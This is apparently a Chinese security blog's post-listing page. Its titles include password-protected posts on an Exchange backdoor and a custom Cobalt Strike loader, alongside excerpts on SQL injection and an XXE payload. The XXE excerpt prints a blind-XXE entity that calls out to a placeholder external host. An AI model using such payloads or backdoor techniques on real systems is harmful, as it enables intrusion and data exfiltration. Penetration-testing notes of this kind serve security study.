会员
周边
新闻
博问
闪存
众包
赞助商
Chat2DB
所有博客
当前博客
我的博客
我的园子
账号设置
会员中心
简洁模式
...
退出登录
注册
登录
Qusss
博客园
首页
订阅
管理
[置顶]
Exchange Backdoor
该文被密码保护。
阅读全文
posted @ 2020-06-04 09:21 Qusss
阅读(1)
评论(0)
推荐(0)
2020年12月29日
自定义Cobalt Strike Loader RC4加密
该文被密码保护。
阅读全文
posted @ 2020-12-29 17:21 Qusss
阅读(0)
评论(0)
推荐(0)
2019年4月25日
SQL 注入
摘要: 获取当前表列数 > 0x01 联合查询注入 联合查询获取可现实数据的列 获取表名 获取列名 获取用户名、密码 > 0x02 MSSQL报错型注入 (1) 正确的输入,通过报错查询当前库中的表名及表的个数: 通过更改上面语句里的9,比如改为1,改为2等,逐个查询表。 结果:查到user_login表
阅读全文
posted @ 2019-04-25 11:24 Qusss
阅读(151)
评论(0)
推荐(0)
2019年4月24日
XXE Payload
摘要: Vanilla, used to verify outbound xxe or blind xxe <!DOCTYPE r [ <!ELEMENT r ANY <!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt" ] &sp; OoB extraction
阅读全文
posted @ 2019-04-24 17:49 Qusss
阅读(228)
评论(0)
推荐(0)
公告